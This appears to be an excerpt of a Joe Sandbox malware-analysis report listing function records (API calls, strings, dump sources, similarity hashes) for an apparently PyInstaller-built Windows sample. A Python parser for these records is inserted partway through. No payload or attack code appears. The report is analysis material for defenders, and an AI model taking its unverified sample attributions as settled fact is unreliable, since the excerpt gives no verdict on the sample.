                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B3AA
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B3BB
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B3CC
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B3E7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                    • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                                    • Instruction ID: 4f8fd3e3ad480a515c0257d243a3328341196199c08efc76b14b57b4b4aba63b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD113B24A0C68282FA587F31769113DE1435F54BB0FA44735E8AEA6FD6DFACA481C731
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C2661B6A), ref: 00007FF7C266295E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                    • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                    • Instruction ID: 03670c0cdb37342e05691df6835660fe32a63f5242df00d64ed4de1105fd1c94
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D231ED22B15A8192E710BB65B8405E6A296BF847E4F800131EECD93B55EFBCD546C730
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                    • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                    • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                                                    • Instruction ID: a64310fd92ac64e056d7ba75fc38410cde472148f533d8b158710979c8469994
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8315D62609A8289EB20BF21E8552F9A361FF887A8F840135EA8D57F59DF7CD104C720
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7C266918F,?,00007FF7C2663C55), ref: 00007FF7C2662BA0
                                                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF7C2662C2A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                    • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                    • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                    • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                    • Instruction ID: 4790b0b2b294c19c476ec75688266e3f9a391377e1abfc216dc38fc722bf17bc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C219462708B8192E710AF24B8447EAA365EB88794F804136EE8DA7B55DF7CD615C720
                                                                                                                                                                                                                                                                    APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7C2661B99), ref: 00007FF7C2662760
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
• Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
• Instruction ID: a2db8bfbd29879900fa33c3fe538a553dd620458a3a898985a0a024709da7d9b
• Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
• Instruction Fuzzy Hash: CD219472619B8192E710AF50B8407E6A3A5AB88794F800135EECCA3B59DFBCD145C720

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
• Instruction ID: 72cf027ff2108743fd0f36c69c3f54dd6eae684aa761f21c900ad8ec229d2326
• Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
• Instruction Fuzzy Hash: 1CF0C821B0970681EB10BF20E45537A9361AF45B71F940235C6EE56BF4DFACD044D330

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
• Instruction ID: 4066623134d92e573f96b82a735dc14fdfbc2894475c7fb6c164c0b88dd34629
• Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
• Instruction Fuzzy Hash: 6611BF62E0EA1381F765BD64D856376A0466F58370F840634EBEF26FD6CEACA841C330

APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B41F
• FlsSetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B43E
• FlsSetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B466
• FlsSetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B477
• FlsSetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B488
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
• Instruction ID: 0e5e7a931b28a25e0706fc9483b5e46d8a3d9439379cd7b3f91e67062d3625c4
• Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
• Instruction Fuzzy Hash: 76115920A0864281FA58BB317651179E1435FA4BB0F988335E8BD66FDADFACA441C730

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
• Instruction ID: 4b2fa603d742e20771aaf7ab28afbb10a72be2bf362c1518ea8d2f621e279cf4
• Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
• Instruction Fuzzy Hash: F8113320A0920685FA68BE31246167A91434F55B30FE84735D8BE6ABC2DFACB881C771

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: verbose
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                    • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                    • Instruction ID: b13c96d9389e21646e8d67393afa8a8b5dc76c55d7ac60490ffc2311014191d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC91C132A08A4681E761BE28E45437DB792AB50FA4FC44131DADA63BD5DFBCE845C330
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
• Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
• Instruction ID: 5787cecd535270cd647b1233ff93a89aeea2fe23a07d31759dde7606a359ad43
• Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
• Instruction Fuzzy Hash: 4781E232D0820285F7A47E25A100A79B6A2AB11F68FE54035DA8DB7FC5DFEDE901C771
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
• Instruction ID: 06d564a4ff99842d35e74d70095c4ee3a4553d9f847a11be92abbd181f581516
• Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
• Instruction Fuzzy Hash: 3051E53AB196428ADB14EF15D40963CB7A2FB44BA8F904134DACE57B84DFBCE841C724
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
• Instruction ID: 13110e3e5d79b316df58c15630aea303bec253a8f69fa59d04f4e7ac4172666d
• Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
• Instruction Fuzzy Hash: B251D73251824286DB70AF219044368B7B1FB54BA4F985135DACE67F99CFBCE850C778
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
• Instruction ID: 380d14fc372b62f1084b5537e562cd8e5221759e4425f2a47c354dc0ef9f410f
• Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
• Instruction Fuzzy Hash: 1B618C32918BC581E720AF15E4417AAF7A1FB94BE4F444225EADD13B95CFBCE190CB24
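Reading these per-function records by hand does not scale once a report has hundreds of them. The parser below is an added example, not Joe Sandbox code and not part of this report: it turns the "APIs / Strings / Memory Dump Source / Similarity" blocks into records, rebases each listed API call site to an RVA against the dump's "Offset:" so it can be followed in IDA on the rebased snapshot, and indexes functions by their Similarity IDs so the same code can be matched within one report or across several. The sample input is constructed from two of the records on this page, trimmed, with the CreateDirectoryW record cut off as it is on the page so that missing Similarity fields are exercised. Treating "$" as the separator inside a "String ID" value is an assumption drawn from the layout of the values shown here, not documented Joe Sandbox behaviour.

```python
"""Parse Joe Sandbox per-function metadata records (APIs / Strings / Memory Dump
Source / Similarity) into objects to pivot on. Added example, not Joe Sandbox code."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records trimmed from the report. The second is cut
# off as it is on the page, so missing Similarity fields must be tolerated.
SAMPLE = """\
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF7C266352C,?,00000000,00007FF7C2663F23), ref: 00007FF7C2667F22
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\\
• API String ID: 4241100979-1685191245
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(arg,...), ref: <hex call-site address>"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
BASE_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")

@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)   # (name, module, [args], call-site address)
    strings: list = field(default_factory=list)
    source_file: Optional[str] = None
    image_base: Optional[int] = None                # the "Offset:" the dump is based at
    associated: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)  # API ID, String ID, Opcode ID, ...

def parse_blocks(text):
    """Split the text into records; a new record starts at every 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue                                # blank line or text outside a record
        item = line.lstrip("• ").strip()
        key, _, value = item.partition(": ")
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = [a.strip() for a in m["args"].split(",")]
                rec.api_calls.append((m["name"], m["module"], args, int(m["ref"], 16)))
        elif section == "Strings":
            rec.strings.append(item)
        elif section == "Memory Dump Source" and key == "Source File":
            rec.source_file = value.split(",")[0]   # "<file>, Offset: <hex>, based on PE: <bool>"
            base = BASE_RE.search(value)
            rec.image_base = int(base[1], 16) if base else None
        elif section == "Memory Dump Source" and key == "Associated":
            rec.associated.append(value)
        elif section == "Similarity":
            rec.similarity[key] = value
    return records

def api_call_rvas(rec):
    """Call sites as RVAs from the dump's base: the offsets to jump to in IDA."""
    if rec.image_base is None:
        return []
    return [(name, ref - rec.image_base) for name, _, _, ref in rec.api_calls]

def similarity_strings(rec):
    """Assumption: '$' joins the individual strings behind a 'String ID' value."""
    sid = rec.similarity.get("String ID")
    return sid.split("$") if sid else []

def group_by(records, key):
    """Index records by a Similarity field such as 'Opcode ID'; a group with more
    than one member is the same code seen more than once (or across reports)."""
    groups = defaultdict(list)
    for i, r in enumerate(records):
        if r.similarity.get(key):
            groups[r.similarity[key]].append(i)
    return dict(groups)
```

Feeding the concatenated text of several reports into parse_blocks and then group_by(records, "Opcode ID") gives the functions that are byte-for-byte the same across samples (the fuzzy-hash fields identify near matches and need a fuzzy comparison, which this does not do). The RVA for the CreateDirectoryW call site above comes out as 0x7F22, which is the offset to seek to in the rebased hcaresult snapshot.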
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,?,00007FF7C266352C,?,00000000,00007FF7C2663F23), ref: 00007FF7C2667F22
                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
APIs
Strings
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
APIs
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
APIs
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
